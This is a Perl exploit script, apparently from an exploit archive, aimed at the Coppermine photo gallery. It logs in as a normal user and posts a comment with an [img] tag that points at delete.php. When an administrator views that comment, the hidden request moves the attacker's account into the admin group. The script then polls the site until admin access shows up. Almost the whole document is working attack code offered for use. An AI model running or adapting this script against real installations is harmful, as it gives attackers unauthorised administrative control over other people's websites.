#!/usr/bin/perl #inphex - inphex0 at gmail dot com #based on http://milw0rm.com/exploits/8114 - found by StAkeR #In case this does not work check out pos(Line 80) and find another value for it use IO::Socket; use LWP::UserAgent; use LWP::Simple; use HTTP::Cookies; $_1 = shift; #[HOST] $h = ($_1 eq ""?($n = 0):($n = 1)); $_2 = shift; #[PATH] $_3 = shift; #[ID] $_4 = shift; #[ALBUMNUM] $_5 = shift; #[USER] $_6 = shift; #[PASS] $d_p = 80; if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) { print "perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n"; print "perl coppermine host.com /path/ 3 2 inphex 123456"; exit; } if ($h) { $socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => $_1, PeerPort => $d_p) or die("[-]ERROR"); print $socket "GET $_2 HTTP/1.1\n"; print $socket "Host: $_1\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n";
while ($answer = <$socket>) { $f_answer = $f_answer.$answer; } $url = &gen_url($_1,$_2,$_3); if ($url) { $code = &gen_code($url); $res = &_send($_1,$_2,$_3,$_4,$code,$_5,$_6); }
sub gen_url($$$) { $h = shift; $p = shift; $i = shift; $url = "http://".$_1.$_2."delete.php?id=u".$i."&u".$i."=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no"; return $url; } sub gen_code($) { $url = shift; $code = "yoyoyo[img]".$url."[/img]"; return $code; } sub _send($$$$$$$) { $h = "http://".shift; $p = shift; $i = shift; $aid = shift; $co = shift; $u = shift; $pass = shift;
$xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $xpl->cookie_jar( $cookie_jar ); $login = $xpl->post($h.$p.'login.php?referer=index.php', Content => [ "username" => $u, "password" => $pass, "submitted" => "Login", ],); if($cookie_jar->as_string) { $c = 1; print "[+]Connected\n"; print "[+]Logged in\n"; }else { $c = 0; } if ($c) { $con = get("".$h.$p."displayimage.php?album=".$aid."&pos=0"); #pos may be changed if ($con =~m/addfav\.php\?pid=(.*?)\&/) { $p_id = $1;
} $se = $xpl->post($h.$p.'db_input.php',Content_Type => 'form-data', Content => [ 'msg_author' => $u, 'msg_body' => $co, 'event' => 'comment', 'pid' => $p_id, 'submit' => "OK", ],); print "[+]Comment sent\n"; print "[/]Waiting for admin to view\n"; $| = 0; while (1) { sleep(20); syswrite STDOUT,"-"; $xpl1 = LWP::UserAgent->new() or die; $cookie_jar1 = HTTP::Cookies->new(); $xpl1->cookie_jar( $cookie_jar1 ); $_con = get("".$h.$p."logout.php?referer=index.php"); $login = $xpl1->post($h.$p.'login.php?referer=index.php', Content => [ "username" => $u, "password" => $pass, "submitted" => "Login", ],);
$const = $xpl1->get($h.$p."index.php"); if ($const->as_string =~m/Config/) { print "\n[+]You just gained Admin Privileges"; exit; } } }